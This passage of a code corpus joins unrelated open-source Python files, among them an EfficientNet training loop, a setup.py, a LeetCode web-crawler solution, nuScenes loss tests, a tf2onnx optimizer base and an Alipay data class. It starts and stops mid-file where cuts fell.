weight_decay: float, L2-regularization constant
finetune: bool, if true sets model's dropout and BN layers to eval mode
optimizer: optional optimizer
Returns:
metrics: dict, metrics from epoch, contains keys:
'loss': float, mean per-example loss over entire epoch,
only included if loss_fn is not None
'acc_top{k}': float, accuracy@k over the entire epoch
heaps: dict, keys are ['tp', 'fp', 'fn'], values are heap_dicts,
each heap_dict maps label_id (int) to a heap of <= 5 HeapItems with
data attribute (img, target, top3_conf, top3_preds, img_file)
- 'tp': priority is the difference between target confidence and
2nd highest confidence
- 'fp': priority is the difference between highest confidence and
target confidence
- 'fn': same as 'fp'
confusion_matrix: np.ndarray, shape [num_classes, num_classes],
C[i, j] = # of samples with true label i, predicted as label j
"""
# if evaluating or finetuning, set dropout & BN layers to eval mode
is_train = False
train_dropout_and_bn = False
if optimizer is not None:
assert loss_fn is not None
is_train = True
if not finetune:
train_dropout_and_bn = True
reg_vars = [
v for v in model.trainable_variables if 'kernel' in v.name]
if loss_fn is not None:
losses = tf.keras.metrics.Mean()
accuracies_topk = {
k: tf.keras.metrics.SparseTopKCategoricalAccuracy(k) for k in top
}
# for each label, track 5 most-confident and least-confident examples
tp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fp_heaps: dict[int, list[HeapItem]] = defaultdict(list)
fn_heaps: dict[int, list[HeapItem]] = defaultdict(list)
all_labels = []
all_preds = []
tqdm_loader = tqdm.tqdm(loader)
for batch in tqdm_loader:
if weighted:
inputs, labels, img_files, weights = batch
else:
# even if batch contains sample weights, don't use them
inputs, labels, img_files = batch[0:3]
weights = None
all_labels.append(labels.numpy())
desc = []
with tf.GradientTape(watch_accessed_variables=is_train) as tape:
outputs = model(inputs, training=train_dropout_and_bn)
if loss_fn is not None:
loss = loss_fn(labels, outputs)
if weights is not None:
loss *= weights
# we do not track L2-regularization loss in the loss metric
losses.update_state(loss, sample_weight=weights)
desc.append(f'Loss {losses.result().numpy():.4f}')
if optimizer is not None:
loss = tf.math.reduce_mean(loss)
if not finetune: # only regularize layers before the final FC
                    loss += weight_decay * tf.add_n(
                        [tf.nn.l2_loss(v) for v in reg_vars])
all_preds.append(tf.math.argmax(outputs, axis=1).numpy())
if optimizer is not None:
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
for k, acc in accuracies_topk.items():
acc.update_state(labels, outputs, sample_weight=weights)
desc.append(f'Acc@{k} {acc.result().numpy() * 100:.3f}')
tqdm_loader.set_description(' '.join(desc))
if return_extreme_images:
track_extreme_examples(tp_heaps, fp_heaps, fn_heaps, inputs,
labels, img_files, outputs)
confusion_matrix = sklearn.metrics.confusion_matrix(
y_true=np.concatenate(all_labels), y_pred=np.concatenate(all_preds))
metrics = {}
if loss_fn is not None:
metrics['loss'] = losses.result().numpy().item()
for k, acc in accuracies_topk.items():
metrics[f'acc_top{k}'] = acc.result().numpy().item() * 100
heaps = {'tp': tp_heaps, 'fp': fp_heaps, 'fn': fn_heaps}
return metrics, heaps, confusion_matrix
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Trains classifier.')
parser.add_argument(
'dataset_dir',
help='path to directory containing: 1) classification dataset CSV, '
'2) label index JSON, 3) splits JSON')
parser.add_argument(
'cropped_images_dir',
help='path to local directory where image crops are saved')
parser.add_argument(
'--multilabel', action='store_true',
help='for multi-label, multi-class classification')
parser.add_argument(
'-m', '--model-name', default='efficientnet-b0',
choices=list(EFFICIENTNET_MODELS.keys()),
help='which EfficientNet model')
parser.add_argument(
'--pretrained', action='store_true',
help='start with pretrained model')
parser.add_argument(
'--finetune', type=int, default=0,
help='only fine tune the final fully-connected layer for the first '
'<finetune> epochs')
parser.add_argument(
'--label-weighted', action='store_true',
help='weight training samples to balance labels')
parser.add_argument(
'--weight-by-detection-conf', nargs='?', const=True, default=False,
help='weight training examples by detection confidence. '
'Optionally takes a .npz file for isotonic calibration.')
parser.add_argument(
'--epochs', type=int, default=0,
help='number of epochs for training, 0 for eval-only')
parser.add_argument(
'--batch-size', type=int, default=256,
help='batch size for both training and eval')
parser.add_argument(
'--lr', type=float, default=None,
help='initial learning rate, defaults to (0.016 * batch_size / 256)')
parser.add_argument(
'--weight-decay', type=float, default=1e-5,
help='weight decay')
parser.add_argument(
'--seed', type=int,
help='random seed')
parser.add_argument(
'--logdir', default='.',
help='directory where TensorBoard logs and a params file are saved')
parser.add_argument(
'--cache', nargs='*', choices=['train', 'val', 'test'], default=(),
help='which splits of the dataset to cache')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
if args.lr is None:
args.lr = 0.016 * args.batch_size / 256 # based on TF models repo
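        # worked example: the default batch size of 256 gives lr = 0.016,
        # while --batch-size 512 gives 0.016 * 512 / 256 = 0.032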
main(dataset_dir=args.dataset_dir,
cropped_images_dir=args.cropped_images_dir,
multilabel=args.multilabel,
model_name=args.model_name,
pretrained=args.pretrained,
finetune=args.finetune,
label_weighted=args.label_weighted,
weight_by_detection_conf=args.weight_by_detection_conf,
epochs=args.epochs,
batch_size=args.batch_size,
lr=args.lr,
weight_decay=args.weight_decay,
seed=args.seed,
logdir=args.logdir,
cache_splits=args.cache)
|
pybo/inits/__init__.py | hfukada/pybo | 115 | 15722 |
"""
Initialization methods.
"""
# pylint: disable=wildcard-import
from .methods import *
from . import methods
__all__ = []
__all__ += methods.__all__
|
setup.py | giampaolo/pysendfile | 119 | 15731 | #!/usr/bin/env python
# ======================================================================
# This software is distributed under the MIT license reproduced below:
#
# Copyright (C) 2009-2014 <NAME>' <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Giampaolo Rodola' not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# <NAME>' DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT <NAME>' BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
import sys
try:
from setuptools import Extension, setup
except ImportError:
from distutils.core import Extension, setup
NAME = 'pysendfile'
VERSION = '2.0.1'
if sys.version_info < (2, 5):
sys.exit('python version not supported (< 2.5)')
if 'sunos' in sys.platform:
libraries = ["sendfile"]
else:
libraries = []
def main():
setup(name=NAME,
url='https://github.com/giampaolo/pysendfile',
version=VERSION,
description='A Python interface to sendfile(2)',
long_description=open('README.rst', 'r').read(),
author='<NAME>',
author_email='<EMAIL>',
platforms='UNIX',
license='MIT',
keywords=['sendfile', 'python', 'performance', 'ftp'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: SunOS/Solaris',
'Operating System :: POSIX :: AIX',
'Programming Language :: C',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: System :: Networking',
'Topic :: System :: Operating System',
'Topic :: Internet :: File Transfer Protocol (FTP)',
'Topic :: Internet :: WWW/HTTP',
'License :: OSI Approved :: MIT License',
],
ext_modules=[Extension('sendfile',
sources=['sendfilemodule.c'],
libraries=libraries)])
if __name__ == '__main__':
main()
|
dynamic_rest/datastructures.py | reinert/dynamic-rest | 690 | 15762 |
"""This module contains custom data-structures."""
import six
class TreeMap(dict):
"""Tree structure implemented with nested dictionaries."""
def get_paths(self):
"""Get all paths from the root to the leaves.
For example, given a chain like `{'a':{'b':{'c':None}}}`,
this method would return `[['a', 'b', 'c']]`.
Returns:
            A list of paths, where each path is a list of keys from the
            root to a leaf.
"""
paths = []
for key, child in six.iteritems(self):
if isinstance(child, TreeMap) and child:
# current child is an intermediate node
for path in child.get_paths():
path.insert(0, key)
paths.append(path)
else:
# current child is an endpoint
paths.append([key])
return paths
def insert(self, parts, leaf_value, update=False):
"""Add a list of nodes into the tree.
The list will be converted into a TreeMap (chain) and then
merged with the current TreeMap.
For example, this method would insert `['a','b','c']` as
`{'a':{'b':{'c':{}}}}`.
Arguments:
parts: List of nodes representing a chain.
leaf_value: Value to insert into the leaf of the chain.
            update: If True, merge the given value into the existing leaf
                using `dict.update`; otherwise replace the leaf with the value.
Returns:
self
"""
tree = self
if not parts:
return tree
cur = tree
last = len(parts) - 1
for i, part in enumerate(parts):
if part not in cur:
cur[part] = TreeMap() if i != last else leaf_value
elif i == last: # found leaf
if update:
cur[part].update(leaf_value)
else:
cur[part] = leaf_value
cur = cur[part]
return self
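# --- Hedged usage example (not part of the original module) ---
# A small end-to-end illustration of insert() and get_paths() on chains like
# the ones described in the docstrings above.
def _example_treemap():
    tree = TreeMap()
    tree.insert(['a', 'b', 'c'], leaf_value=TreeMap())
    tree.insert(['a', 'd'], leaf_value=TreeMap())
    # get_paths() walks from the root down to every leaf.
    return sorted(tree.get_paths())  # [['a', 'b', 'c'], ['a', 'd']]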
|
lottery/branch/retrain.py | chenw23/open_lth | 509 | 15764 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import datasets.registry
from foundations import hparams
from foundations.step import Step
from lottery.branch import base
import models.registry
from pruning.mask import Mask
from pruning.pruned_model import PrunedModel
from training import train
class Branch(base.Branch):
def branch_function(
self,
retrain_d: hparams.DatasetHparams,
retrain_t: hparams.TrainingHparams,
start_at_step_zero: bool = False
):
# Get the mask and model.
m = models.registry.load(self.level_root, self.lottery_desc.train_start_step, self.lottery_desc.model_hparams)
m = PrunedModel(m, Mask.load(self.level_root))
start_step = Step.from_iteration(0 if start_at_step_zero else self.lottery_desc.train_start_step.iteration,
datasets.registry.iterations_per_epoch(retrain_d))
train.standard_train(m, self.branch_root, retrain_d, retrain_t, start_step=start_step, verbose=self.verbose)
@staticmethod
def description():
return "Retrain the model with different hyperparameters."
@staticmethod
def name():
return 'retrain'
|
Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 15769 | # Time: O(|V| + |E|)
# Space: O(|V|)
# """
# This is HtmlParser's API interface.
# You should not implement it, or speculate about its implementation
# """
class HtmlParser(object):
def getUrls(self, url):
"""
:type url: str
:rtype List[str]
"""
pass
class Solution(object):
def crawl(self, startUrl, htmlParser):
"""
:type startUrl: str
:type htmlParser: HtmlParser
:rtype: List[str]
"""
SCHEME = "http://"
def hostname(url):
pos = url.find('/', len(SCHEME))
if pos == -1:
return url
return url[:pos]
result = [startUrl]
lookup = set(result)
for from_url in result:
name = hostname(from_url)
for to_url in htmlParser.getUrls(from_url):
if to_url not in lookup and name == hostname(to_url):
result.append(to_url)
lookup.add(to_url)
return result
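# --- Hedged local sketch (not part of the LeetCode submission) ---
# _StubParser is a hypothetical stand-in for the judge-provided HtmlParser;
# it shows that crawl() only follows links on the start URL's hostname
# ("http://a.com" pages are kept, "http://b.com" is not).
class _StubParser(object):
    def __init__(self, edges):
        self.edges = edges

    def getUrls(self, url):
        return self.edges.get(url, [])


if __name__ == "__main__":
    edges = {"http://a.com": ["http://a.com/x", "http://b.com"],
             "http://a.com/x": ["http://a.com"]}
    print(Solution().crawl("http://a.com", _StubParser(edges)))
    # -> ['http://a.com', 'http://a.com/x']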
|
settings.py | ArneBinder/Pytorch-LRP | 117 | 15806 |
"""
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimer’s disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
settings = {
"model_path": INSERT,
"data_path": INSERT,
"ADNI_DIR": INSERT,
"train_h5": INSERT,
"val_h5": INSERT,
"holdout_h5": INSERT,
"binary_brain_mask": "binary_brain_mask.nii.gz",
"nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
"nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py | jie311/TraDeS | 475 | 15842 |
import math
import unittest
import torch
from nuscenes.prediction.models import mtp
class TestMTPLoss(unittest.TestCase):
"""
Test each component of MTPLoss as well as the
__call__ method.
"""
def test_get_trajectories_and_modes(self):
loss_n_modes_5 = mtp.MTPLoss(5, 0, 0)
loss_n_modes_1 = mtp.MTPLoss(1, 0, 0)
xy_pred = torch.arange(60).view(1, -1).repeat(1, 5).view(-1, 60)
mode_pred = torch.arange(5).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing many modes with batch size 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing many modes with batch size > 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
xy_pred = torch.arange(60).view(1, -1).repeat(1, 1).view(-1, 60)
mode_pred = torch.arange(1).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing one mode with batch size 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing one mode with batch size > 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
def test_angle_between_trajectories(self):
def make_trajectory(last_point):
traj = torch.zeros((12, 2))
traj[-1] = torch.Tensor(last_point)
return traj
loss = mtp.MTPLoss(0, 0, 0)
# test angle is 0.
self.assertEqual(loss._angle_between(make_trajectory([0, 0]), make_trajectory([0, 0])), 0.)
self.assertEqual(loss._angle_between(make_trajectory([15, 15]), make_trajectory([15, 15])), 0.)
# test angle is 15.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([math.sqrt(3)/2, 0.5])), 15., places=4)
# test angle is 30.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([math.sqrt(3)/2, 0.5])), 30., places=4)
# test angle is 45.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([0, 1])), 45., places=4)
# test angle is 90.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([-1, 1])), 90., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([0, 1])), 90., places=4)
# test angle is 180.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([-1, 0])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([0, 1]),
make_trajectory([0, -1])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([3, 1]),
make_trajectory([-3, -1])), 180., places=4)
def test_compute_best_mode_nothing_below_threshold(self):
angles = [(90, 0), (80, 1), (70, 2)]
target = None
traj = None
loss = mtp.MTPLoss(3, 0, 5)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
loss = mtp.MTPLoss(3, 0, 65)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
def test_compute_best_mode_only_one_below_threshold(self):
angles = [(30, 1), (3, 0), (25, 2)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_compute_best_mode_multiple_below_threshold(self):
angles = [(2, 2), (4, 1), (10, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
trajectory[1] = 1
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 1)
def test_compute_best_mode_only_one_mode(self):
angles = [(25, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((1, 6, 2))
loss = mtp.MTPLoss(1, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
trajectory[0] = 1
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_loss_single_mode(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 61))
predictions[:, :60] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, 60] = 1/10
loss = mtp.MTPLoss(1, 1, angle_threshold_degrees=20)
# Only regression loss in single mode case.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
0, places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, :60] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()), 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, :60] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
(15/16)*0.5,
places=4)
def test_loss_many_modes(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 610))
predictions[:, 540:600] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, -10:] = 1/10
loss = mtp.MTPLoss(10, 1, angle_threshold_degrees=20)
# Since one mode exactly matches gt, loss should only be classification error.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10), places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, 540:600] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, 540:600] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + (15/16)*0.5,
places=4)
|
Engine/Shaders/compile_all_shader.py | ValtoGameEngines/Fish-Engine | 240 | 15845 |
import os
import sys
compiler = r'../Binary/RelWithDebInfo/ShaderCompiler'
#compiler = r'../Binary/Debug/ShaderCompiler'
shader_dirs = ['.', './Editor']
count = 0
for d in shader_dirs:
for fn in os.listdir(d):
print(fn)
ext = fn.split('.')[-1]
if ext in ['surf', 'shader']:
cmd = compiler + ' ' + os.path.abspath(os.path.join(d, fn))
print(cmd)
if os.system(cmd) != 0:
print("Compile ERROR: ", fn)
sys.exit()
count += 1
print("Done. {} shaders compiled.".format(count)) |
tf2onnx/optimizer/optimizer_base.py | gcunhase/tensorflow-onnx | 1,473 | 15867 |
# SPDX-License-Identifier: Apache-2.0
"""Graph Optimizer Base"""
import copy
from .. import logging, utils
class GraphOptimizerBase(object):
"""optimizer graph to improve performance
"""
def __init__(self):
self._logger = logging.getLogger('.'.join(__name__.split('.')[:-1] + [self.__class__.__name__]))
self._graph_been_opt = False
self.opt_iteration = 0
@property
def logger(self):
return self._logger
@property
def is_debug_mode(self):
return utils.is_debug_mode()
@property
def graph_been_opt(self):
return self._graph_been_opt
@graph_been_opt.setter
def graph_been_opt(self, value):
self._graph_been_opt = value
def optimize(self, graph, iteration):
""" Optimize graph, return optimized graph. """
before = graph.dump_node_statistics()
self.opt_iteration = iteration
graph = self._optimize(graph)
graph.update_proto()
graph.delete_unused_nodes(graph.outputs)
after = graph.dump_node_statistics()
self._print_stat_diff(before, after)
return graph
def _optimize(self, graph):
""" Derived class should override this function. """
raise NotImplementedError
@staticmethod
def _apply_optimization(graph, optimize_func):
"""
        Optimize the given graph; the body graphs of its nodes are
        optimized as well.
Args:
graph: the top level graph to be optimized
optimize_func: function to optimize graph
"""
graph = optimize_func(graph)
for node in graph.get_nodes():
body_graphs = node.get_body_graphs()
if body_graphs:
for attr, b_g in body_graphs.items():
b_g = GraphOptimizerBase._apply_optimization(b_g, optimize_func)
node.set_body_graph_as_attr(attr, b_g)
return graph
def _print_stat_diff(self, before, after):
diff = copy.deepcopy(after)
diff.subtract(before)
diff = ["{} {} ({}->{})".format(k, str(v) if v < 0 else '+' + str(v), before.get(k, 0), after.get(k, 0))
for k, v in sorted(diff.items()) if v != 0]
self.logger.verbose(', '.join(diff) if diff else "no change")
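# --- Hedged sketch (not part of tf2onnx) ---
# Minimal outline of a derived optimizer: a subclass only needs to implement
# _optimize(); the pass-through _visit below is a placeholder for real rewrites.
class _NoopOptimizer(GraphOptimizerBase):
    """Example subclass that walks every (sub)graph without changing it."""

    def _optimize(self, graph):
        def _visit(g):
            # a real optimizer would rewrite or remove nodes of g here
            return g
        return self._apply_optimization(graph, _visit)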
|
utils/builder/register_builder/riscv/BootPriority.py | noahsherrill/force-riscv | 111 | 15887 | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# BootPriority.py
#
# This file defines the BootPriority helper class.
# The boot priority class defines helper methods associated with boot priority
class BootPriority:
    # Returns the appropriate boot priority based on the name and type of the
    # register provided, along with whether the register is write-only.
def getBootPriority(aName=None, aType=None, aWriteOnly=0):
return 1
|
tests/conftest.py | inducer/courseflow | 284 | 15889 |
import pytest
# from pytest_factoryboy import register
def pytest_addoption(parser):
parser.addoption(
"--slow", action="store_true", default=False, help="run slow tests",
)
parser.addoption(
"--all", action="store_true", default=False, help="run all tests",
)
def _is_connection_psql():
from django.db import connection
return connection.vendor == 'postgresql'
def pytest_collection_modifyitems(config, items):
skip_pg = pytest.mark.skip(reason="connection is not a postgres database")
if not _is_connection_psql():
for item in items:
if "postgres" in item.keywords:
item.add_marker(skip_pg)
if config.getoption("--all"):
return
elif config.getoption("--slow"):
skip_non_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" not in item.keywords:
item.add_marker(skip_non_slow)
else:
skip_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
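# --- Usage notes (added commentary, not part of the original conftest) ---
# Given the options and markers handled above, typical invocations would be:
#   pytest              -> skips tests marked "slow"
#   pytest --slow       -> runs only tests marked "slow"
#   pytest --all        -> runs every test
# Tests marked "postgres" are skipped unless the Django connection vendor is
# 'postgresql'.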
|
examples/avatar_example.py | ZSD-tim/dayu_widgets | 157 | 15897 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: <NAME>
# Date : 2019.2
# Email : <EMAIL>
###################################################################
from dayu_widgets.avatar import MAvatar
from dayu_widgets.divider import MDivider
from dayu_widgets.field_mixin import MFieldMixin
from dayu_widgets.label import MLabel
from dayu_widgets.push_button import MPushButton
from dayu_widgets import dayu_theme
from dayu_widgets.qt import QWidget, QVBoxLayout, MPixmap, QFormLayout, Qt, QHBoxLayout
class AvatarExample(QWidget, MFieldMixin):
def __init__(self, parent=None):
super(AvatarExample, self).__init__(parent)
self.setWindowTitle('Example for MAvatar')
main_lay = QVBoxLayout()
main_lay.addWidget(MDivider('different size'))
size_list = [('Huge', MAvatar.huge),
('Large', MAvatar.large),
('Medium', MAvatar.medium),
('Small', MAvatar.small),
('Tiny', MAvatar.tiny)]
self.pix_map_list = [None, MPixmap('avatar.png'),
MPixmap('app-maya.png'),
MPixmap('app-nuke.png'),
MPixmap('app-houdini.png')]
form_lay = QFormLayout()
form_lay.setLabelAlignment(Qt.AlignRight)
for label, cls in size_list:
h_lay = QHBoxLayout()
for image in self.pix_map_list:
avatar_tmp = cls(image)
h_lay.addWidget(avatar_tmp)
h_lay.addStretch()
form_lay.addRow(MLabel(label), h_lay)
main_lay.addLayout(form_lay)
self.register_field('image', None)
main_lay.addWidget(MDivider('different image'))
avatar = MAvatar()
self.bind('image', avatar, 'dayu_image')
button = MPushButton(text='Change Avatar Image').primary()
button.clicked.connect(self.slot_change_image)
main_lay.addWidget(avatar)
main_lay.addWidget(button)
main_lay.addStretch()
self.setLayout(main_lay)
def slot_change_image(self):
"""Set the Avatar image random by data bind."""
import random
self.set_field('image', random.choice(self.pix_map_list))
if __name__ == '__main__':
import sys
from dayu_widgets.qt import QApplication
app = QApplication(sys.argv)
test = AvatarExample()
dayu_theme.apply(test)
test.show()
sys.exit(app.exec_())
|
Chapter02/Shuffle.py | Tanishadel/Mastering-Machine-Learning-for-Penetration-Testing | 241 | 15906 | <reponame>Tanishadel/Mastering-Machine-Learning-for-Penetration-Testing<filename>Chapter02/Shuffle.py
import os
import random
#initiate a list called emails_list
emails_list = []
Directory = '/home/azureuser/spam_filter/enron1/emails/'
Dir_list = os.listdir(Directory)
for file in Dir_list:
f = open(Directory + file, 'r')
emails_list.append(f.read())
f.close()
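# Note: `random` is imported above but never used; given the file name Shuffle.py,
# the presumable (assumed) final step is to shuffle the collected emails:
random.shuffle(emails_list)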
|
alipay/aop/api/domain/RequestExtShopItem.py | snowxmas/alipay-sdk-python-all | 213 | 15918 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class RequestExtShopItem(object):
def __init__(self):
self._brand_code = None
self._category_code = None
self._description = None
self._item_code = None
self._kb_shop_id = None
self._price = None
self._title = None
@property
def brand_code(self):
return self._brand_code
@brand_code.setter
def brand_code(self, value):
self._brand_code = value
@property
def category_code(self):
return self._category_code
@category_code.setter
def category_code(self, value):
self._category_code = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def item_code(self):
return self._item_code
@item_code.setter
def item_code(self, value):
self._item_code = value
@property
def kb_shop_id(self):
return self._kb_shop_id
@kb_shop_id.setter
def kb_shop_id(self, value):
self._kb_shop_id = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
def to_alipay_dict(self):
params = dict()
if self.brand_code:
if hasattr(self.brand_code, 'to_alipay_dict'):
params['brand_code'] = self.brand_code.to_alipay_dict()
else:
params['brand_code'] = self.brand_code
if self.category_code:
if hasattr(self.category_code, 'to_alipay_dict'):
params['category_code'] = self.category_code.to_alipay_dict()
else:
params['category_code'] = self.category_code
if self.description:
if hasattr(self.description, 'to_alipay_dict'):
params['description'] = self.description.to_alipay_dict()
else:
params['description'] = self.description
if self.item_code:
if hasattr(self.item_code, 'to_alipay_dict'):
params['item_code'] = self.item_code.to_alipay_dict()
else:
params['item_code'] = self.item_code
if self.kb_shop_id:
if hasattr(self.kb_shop_id, 'to_alipay_dict'):
params['kb_shop_id'] = self.kb_shop_id.to_alipay_dict()
else:
params['kb_shop_id'] = self.kb_shop_id
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
return params
@staticmethod
def from_alipay_dict(d):
if not d:
